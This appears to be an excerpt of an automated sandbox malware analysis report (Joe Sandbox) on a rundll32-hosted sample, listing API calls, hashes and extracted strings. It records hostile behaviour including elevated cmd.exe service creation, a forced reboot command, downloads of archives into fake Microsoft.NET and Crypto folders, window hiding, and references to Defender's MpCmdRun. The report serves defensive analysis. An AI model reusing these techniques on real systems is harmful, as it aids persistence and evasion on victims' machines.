                              • Associated: 0000000D.00000002.3860044790.0000000004241000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860069598.0000000004247000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860092185.0000000004248000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860119452.000000000424F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860154622.0000000004253000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860178818.0000000004255000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004256000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004258000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_3ff0000_rundll32.jbxd
                              Similarity
                              • API ID: CompareString
                              • String ID:
                              • API String ID: 1825529933-0
                              • Opcode ID: 70a9d858d9c975c01454a309cc797e3c1710bd535245f3163fda3bc1f5f64627
                              • Instruction ID: 4a9fc50475881b7bb11a2e16d8461d4ed5c891800851c9276c69a4b935d36609
                              • Opcode Fuzzy Hash: 70a9d858d9c975c01454a309cc797e3c1710bd535245f3163fda3bc1f5f64627
                              • Instruction Fuzzy Hash: 82F0A979204704AEEB02EB78DD52E5E77ECDF88740B114461FE04EB230D6649E008A20
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 388 3ffd658-3ffd666 389 3ffd668-3ffd67f GetModuleFileNameW call 3ffe8cc 388->389 390 3ffd693-3ffd69e 388->390 392 3ffd684-3ffd68b 389->392 392->390 393 3ffd68d-3ffd690 392->393 393->390
                              APIs
                              • GetModuleFileNameW.KERNEL32(03FF0000,?,0000020A), ref: 03FFD676
                                • Part of subcall function 03FFE8CC: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,03FFE986,?,03FF0000,04241C1C), ref: 03FFE908
                                • Part of subcall function 03FFE8CC: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,03FFE986,?,03FF0000,04241C1C), ref: 03FFE959
                              Memory Dump Source
                              • Source File: 0000000D.00000002.3859788011.0000000003FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 03FF0000, based on PE: true
                              • Associated: 0000000D.00000002.3859769153.0000000003FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3859788011.000000000400C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860044790.0000000004241000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860069598.0000000004247000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860092185.0000000004248000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860119452.000000000424F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860154622.0000000004253000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860178818.0000000004255000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004256000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004258000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_3ff0000_rundll32.jbxd
                              Similarity
                              • API ID: FileModuleName$LibraryLoad
                              • String ID:
                              • API String ID: 4113206344-0
                              • Opcode ID: 53da31fff64a53f6825a8500a7483ba432167d46bc4a034368a05d7b6de3c32f
                              • Instruction ID: c7d9d319d90473335c6be03353cfcf1c463455cbc4a78a61f307cc72f89a8c17
                              • Opcode Fuzzy Hash: 53da31fff64a53f6825a8500a7483ba432167d46bc4a034368a05d7b6de3c32f
                              • Instruction Fuzzy Hash: 92E0ED75A003119FCB10EE5CC9C4A4637D8AF09754F0449A1AE18CF25AD371D91487D2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 394 40002f4-4000304 GetSystemInfo
                              APIs
                              Memory Dump Source
                              • Source File: 0000000D.00000002.3859788011.0000000003FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 03FF0000, based on PE: true
                              • Associated: 0000000D.00000002.3859769153.0000000003FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3859788011.000000000400C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860044790.0000000004241000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860069598.0000000004247000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860092185.0000000004248000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860119452.000000000424F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860154622.0000000004253000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860178818.0000000004255000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004256000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004258000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_3ff0000_rundll32.jbxd
                              Similarity
                              • API ID: InfoSystem
                              • String ID:
                              • API String ID: 31276548-0
                              • Opcode ID: cfabf06fd0a7d5aa08c154ff74241a738d374e25dc305ab9149cadf724005ebe
                              • Instruction ID: 1273033b2248859ff5682c59f248d6657a1d1e320256fc455640c857afe803e7
                              • Opcode Fuzzy Hash: cfabf06fd0a7d5aa08c154ff74241a738d374e25dc305ab9149cadf724005ebe
                              • Instruction Fuzzy Hash: 3DA012144085004EC804E7185C4240B35801D42110FC40310685CD92A1E605C96806D7
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 395 3ff5694-3ff56b2 call 3ff5628 VirtualAlloc 398 3ff56b4-3ff5701 395->398 399 3ff5702-3ff570d 395->399
                              APIs
                              • VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,?,03FF5CAB), ref: 03FF56AB
                              Memory Dump Source
                              • Source File: 0000000D.00000002.3859788011.0000000003FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 03FF0000, based on PE: true
                              • Associated: 0000000D.00000002.3859769153.0000000003FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3859788011.000000000400C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860044790.0000000004241000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860069598.0000000004247000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860092185.0000000004248000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860119452.000000000424F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860154622.0000000004253000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860178818.0000000004255000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004256000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004258000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_3ff0000_rundll32.jbxd
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0
                              • Opcode ID: 4b25f0ef7471a8f8c5080f050e7c9b565d32d5bbf8e49f551d6558e0e7cc330a
                              • Instruction ID: 79c0dddcac13da25b9c445d86a87e726789cd00a8af63c67b2dc40e2ecf270b8
                              • Opcode Fuzzy Hash: 4b25f0ef7471a8f8c5080f050e7c9b565d32d5bbf8e49f551d6558e0e7cc330a
                              • Instruction Fuzzy Hash: 39F08CF6B813214FE718CF7CAA447027BE5EB89350F11413EEA49DBB84D7B488008780
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?), ref: 03FFDFF5
                              • GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 03FFE006
                              • FindFirstFileW.KERNEL32(?,?,kernel32.dll,?,?,?), ref: 03FFE106
                              • FindClose.KERNEL32(?,?,?,kernel32.dll,?,?,?), ref: 03FFE118
                              • lstrlenW.KERNEL32(?,?,?,?,kernel32.dll,?,?,?), ref: 03FFE124
                              • lstrlenW.KERNEL32(?,?,?,?,?,kernel32.dll,?,?,?), ref: 03FFE169
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.3859788011.0000000003FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 03FF0000, based on PE: true
                              • Associated: 0000000D.00000002.3859769153.0000000003FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3859788011.000000000400C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860044790.0000000004241000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860069598.0000000004247000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860092185.0000000004248000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860119452.000000000424F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860154622.0000000004253000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860178818.0000000004255000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004256000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004258000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_3ff0000_rundll32.jbxd
                              Similarity
                              • API ID: Findlstrlen$AddressCloseFileFirstHandleModuleProc
                              • String ID: GetLongPathNameW$\$kernel32.dll
                              • API String ID: 1930782624-3908791685
                              • Opcode ID: e07991818c39bfcfbf49c91eeeabaf3971d0f36abd60d26b369c5f517c4bb431
                              • Instruction ID: 4f0c39cc5aa5f526b55c690c172ac640d707df75ff59bae58ed6d1782fb2bd4e
                              • Opcode Fuzzy Hash: e07991818c39bfcfbf49c91eeeabaf3971d0f36abd60d26b369c5f517c4bb431
                              • Instruction Fuzzy Hash: 29418335E006199FCB20EE98CC84ADEB3B6AF55310F1885A59E04E72B4E774AF45CB85
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetWindowLongW.USER32(?,000000EC), ref: 041DA98E
                              • IsIconic.USER32(?), ref: 041DA9BC
                              • IsWindowVisible.USER32(?), ref: 041DA9CC
                              • ShowWindow.USER32(?,00000000,00000000,?,?,?,041E7CEF,?,042501D8), ref: 041DA9E9
                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 041DA9FC
                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 041DAA0D
                              • ShowWindow.USER32(?,00000006,00000000,?,?,?,041E7CEF,?,042501D8), ref: 041DAA2D
                              • ShowWindow.USER32(?,00000005,00000000,?,?,?,041E7CEF,?,042501D8), ref: 041DAA37
                              Memory Dump Source
                              • Source File: 0000000D.00000002.3859788011.000000000400C000.00000020.00000001.01000000.00000003.sdmp, Offset: 03FF0000, based on PE: true
                              • Associated: 0000000D.00000002.3859769153.0000000003FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3859788011.0000000003FF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860044790.0000000004241000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860069598.0000000004247000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860092185.0000000004248000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860119452.000000000424F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860154622.0000000004253000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860178818.0000000004255000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004256000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004258000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_3ff0000_rundll32.jbxd
                              Similarity
                              • API ID: Window$LongShow$IconicVisible
                              • String ID:
                              • API String ID: 3484284227-0
                              • Opcode ID: c74bf0e026c854b3b44ddba827d494ec2bf525f8a6b6d9999ba6dd5f4b26a9a2
                              • Instruction ID: 9b94c40088d58cf664146a5ed2e6b15c1fc99bd716acfb66d177bed8b056c2e8
                              • Opcode Fuzzy Hash: c74bf0e026c854b3b44ddba827d494ec2bf525f8a6b6d9999ba6dd5f4b26a9a2
                              • Instruction Fuzzy Hash: 8811EB8154E6D039F726B6690C41FFF2D954FD339CF198AA5F8D8A20C2C32AB5059276
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 0401EDD8: GetEnvironmentVariableW.KERNEL32(00000000,?,00000400,?,?,?,?,04233D71,04233E04,00000000,04233E2C,?,?,00000000,00000000,?), ref: 0401EE01
                              • MoveFileW.KERNEL32(00000000,00000000), ref: 04233DA0
                              • Sleep.KERNEL32(0000001E,04233E04,00000000,04233E2C,?,?,00000000,00000000,?,?,04235E55,0000012C,00000000,04235E82), ref: 04233DA7
                                • Part of subcall function 042321C4: ShellExecuteW.SHELL32(00000000,runas,cmd.exe,00000000," start= auto,?), ref: 0423221C
                                • Part of subcall function 042358E8: Sleep.KERNEL32(00002328,00000000,04235927,?,?,04233DEF,.exe,04235E82,0000012C,0000001E,04233E04,00000000,04233E2C,?,?,00000000), ref: 042358FE
                                • Part of subcall function 042358E8: WinExec.KERNEL32(C:\WINDOWS\system32\shutdown.exe -r -t 1 -f,00000000), ref: 0423590A
                                • Part of subcall function 042358E8: Sleep.KERNEL32(0000012C,00002328,00000000,04235927,?,?,04233DEF,.exe,04235E82,0000012C,0000001E,04233E04,00000000,04233E2C,?,?), ref: 04235914
                              • Sleep.KERNEL32(0000012C,.exe,04235E82,0000012C,0000001E,04233E04,00000000,04233E2C,?,?,00000000,00000000,?,?,04235E55,0000012C), ref: 04233DF4
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.3859788011.000000000400C000.00000020.00000001.01000000.00000003.sdmp, Offset: 03FF0000, based on PE: true
                              • Associated: 0000000D.00000002.3859769153.0000000003FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3859788011.0000000003FF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860044790.0000000004241000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860069598.0000000004247000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860092185.0000000004248000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860119452.000000000424F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860154622.0000000004253000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860178818.0000000004255000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004256000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004258000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_3ff0000_rundll32.jbxd
                              Similarity
                              • API ID: Sleep$EnvironmentExecExecuteFileMoveShellVariable
                              • String ID: .exe$MpCmdRun$Obligation Feeds$\Microsoft\Crypto\Keys\bin01.zip$appdata$bin01.zip$flyer1$flyer2$flyer3
                              • API String ID: 4165743239-2642550186
                              • Opcode ID: a74893d079939999983c3c502ba744d8d4a673310597ffd12d87e75ca3c3fa1c
                              • Instruction ID: 9c256b0a506ef3af7986af5ebadf78bcea9033ecb95a8afe4043af39418373da
                              • Opcode Fuzzy Hash: a74893d079939999983c3c502ba744d8d4a673310597ffd12d87e75ca3c3fa1c
                              • Instruction Fuzzy Hash: B251FB79B102499FEB01EBA8DC8199EB7B5EF88305F508561EE10BB364DA74FE41CB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetStdHandle.KERNEL32(FFFFFFF5), ref: 03FF79F6
                              • GetStdHandle.KERNEL32(000000F6), ref: 03FF7A01
                              • GetFileType.KERNEL32(00000000), ref: 03FF7A19
                              • GetConsoleOutputCP.KERNEL32(00000000), ref: 03FF7A2B
                              • GetConsoleCP.KERNEL32(00000000), ref: 03FF7A3C
                              • GetFileType.KERNEL32(00000000), ref: 03FF7B87
                              Memory Dump Source
                              • Source File: 0000000D.00000002.3859788011.0000000003FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 03FF0000, based on PE: true
                              • Associated: 0000000D.00000002.3859769153.0000000003FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3859788011.000000000400C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860044790.0000000004241000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860069598.0000000004247000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860092185.0000000004248000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860119452.000000000424F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860154622.0000000004253000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860178818.0000000004255000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004256000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004258000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_3ff0000_rundll32.jbxd
                              Similarity
                              • API ID: ConsoleFileHandleType$Output
                              • String ID:
                              • API String ID: 393880136-0
                              • Opcode ID: e23cf1346c5431361188df2651fb90ebedbf957a399cc8dfc076f2291a43a1c9
                              • Instruction ID: 18c5418478ecccf110184104ffcbb0e34e7ea581bebc66b4e49b042e717032da
                              • Opcode Fuzzy Hash: e23cf1346c5431361188df2651fb90ebedbf957a399cc8dfc076f2291a43a1c9
                              • Instruction Fuzzy Hash: 5651B5719103019EEB20FF688CC4B62B6A8AF46390F1986A5DF058F3B9E734C8498765
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformation), ref: 03FF96B9
                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 03FF96BF
                              • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 03FF96D2
                              • GetLastError.KERNEL32(00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 03FF96DB
                              • GetLogicalProcessorInformation.KERNEL32(?,?,00000000,03FF9752,?,00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 03FF9706
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.3859788011.0000000003FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 03FF0000, based on PE: true
                              • Associated: 0000000D.00000002.3859769153.0000000003FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3859788011.000000000400C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860044790.0000000004241000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860069598.0000000004247000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860092185.0000000004248000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860119452.000000000424F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860154622.0000000004253000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860178818.0000000004255000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004256000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004258000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_3ff0000_rundll32.jbxd
                              Similarity
                              • API ID: InformationLogicalProcessor$AddressErrorHandleLastModuleProc
                              • String ID: @$GetLogicalProcessorInformation$kernel32.dll
                              • API String ID: 1184211438-79381301
                              • Opcode ID: 7842a0f260ddd5aacad9ef4b5cb0e8d702d3912839cfd3f09cbd07bdb9a66ea9
                              • Instruction ID: 03a9c721f0090d4900f31f1b13fc5bc4835b320577672125dff7208833b8c301
                              • Opcode Fuzzy Hash: 7842a0f260ddd5aacad9ef4b5cb0e8d702d3912839cfd3f09cbd07bdb9a66ea9
                              • Instruction Fuzzy Hash: FF113076D00308AEDB10EFA5DD44B9EB7A8EF45700F588095DE1497161E7B89A408B15
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 04026E69
                              • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 04026E85
                              • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 04026EBE
                              • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 04026F3B
                              • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 04026F54
                              • VariantCopy.OLEAUT32(?), ref: 04026F89
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.3859788011.000000000400C000.00000020.00000001.01000000.00000003.sdmp, Offset: 03FF0000, based on PE: true
                              • Associated: 0000000D.00000002.3859769153.0000000003FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3859788011.0000000003FF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860044790.0000000004241000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860069598.0000000004247000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860092185.0000000004248000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860119452.000000000424F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860154622.0000000004253000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860178818.0000000004255000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004256000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004258000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_3ff0000_rundll32.jbxd
                              Similarity
                              • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                              • String ID:
                              • API String ID: 351091851-3916222277
                              • Opcode ID: 53daf564fbfc4f2e90bc9f908b06c784015e8e5d50bafb180f1ae0b614ca888d
                              • Instruction ID: b5f1830cfb13df0a8d7c7a202ed3fb91373266bae301ac5059e83692887114c7
                              • Opcode Fuzzy Hash: 53daf564fbfc4f2e90bc9f908b06c784015e8e5d50bafb180f1ae0b614ca888d
                              • Instruction Fuzzy Hash: B651FA75A0063D9BDF62EB58CD80AD9B3FCBF49208F0046E5E509B7255DA31AF848F61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • IsUserAnAdmin.SHELL32 ref: 0422D108
                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0422D18A
                                • Part of subcall function 04016358: GetFileAttributesW.KERNEL32(00000000,?,?,?,?,?,0422D12F,00000000,0422D1B1), ref: 0401636E
                                • Part of subcall function 04016DC8: CreateDirectoryW.KERNEL32(00000000,00000000,?,0422D13D,00000000,0422D1B1), ref: 04016DD5
                                • Part of subcall function 04235DCC: Sleep.KERNEL32(0000012C,00000000,04235E82), ref: 04235E03
                                • Part of subcall function 04235DCC: URLDownloadToFileW.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 04235E20
                                • Part of subcall function 04235DCC: Sleep.KERNEL32(0000012C,0000012C,00000000,04235E82), ref: 04235E5A
                              Strings
                              • C:\Program Files (x86)\Microsoft.NET\base, xrefs: 0422D125, 0422D133
                              • C:\Program Files (x86)\Microsoft.NET\ahs.zip, xrefs: 0422D15F
                              • C3312E937EE0C1D40820B7C1234FD3F6D25BA532031EED7B40262483E03B2E1C268CCA9A99BF76276A57E69E3C3367AF87E9253027DCA581621977496336AF, xrefs: 0422D14B
                              Memory Dump Source
                              • Source File: 0000000D.00000002.3859788011.000000000400C000.00000020.00000001.01000000.00000003.sdmp, Offset: 03FF0000, based on PE: true
                              • Associated: 0000000D.00000002.3859769153.0000000003FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3859788011.0000000003FF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860044790.0000000004241000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860069598.0000000004247000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860092185.0000000004248000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860119452.000000000424F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860154622.0000000004253000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860178818.0000000004255000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004256000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004258000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_3ff0000_rundll32.jbxd
                              Similarity
                              • API ID: FileSleep$AdminAttributesCreateDirectoryDownloadMessageUser
                              • String ID: C3312E937EE0C1D40820B7C1234FD3F6D25BA532031EED7B40262483E03B2E1C268CCA9A99BF76276A57E69E3C3367AF87E9253027DCA581621977496336AF$C:\Program Files (x86)\Microsoft.NET\ahs.zip$C:\Program Files (x86)\Microsoft.NET\base
                              • API String ID: 3215071381-1565531728
                              • Opcode ID: d6007b8270065e88af2e794b2a4491e16943bc865408782323e5a9c63c895775
                              • Instruction ID: 7d633a2adc58518a267fba2bac6061ab954066c0934e21b6fe411716e458b7b0
                              • Opcode Fuzzy Hash: d6007b8270065e88af2e794b2a4491e16943bc865408782323e5a9c63c895775
                              • Instruction Fuzzy Hash: CB118174734715BFF710EF68DE40ADE73A9EF49608F514460E901F7AA0EA35BD009A60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • Sleep.KERNEL32(00000000,?), ref: 03FF5DCA
                              • Sleep.KERNEL32(0000000A,00000000,?), ref: 03FF5DE4
                              Memory Dump Source
                              • Source File: 0000000D.00000002.3859788011.0000000003FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 03FF0000, based on PE: true
                              • Associated: 0000000D.00000002.3859769153.0000000003FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3859788011.000000000400C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860044790.0000000004241000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860069598.0000000004247000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860092185.0000000004248000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860119452.000000000424F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860154622.0000000004253000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860178818.0000000004255000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004256000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004258000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_3ff0000_rundll32.jbxd
                              Similarity
                              • API ID: Sleep
                              • String ID:
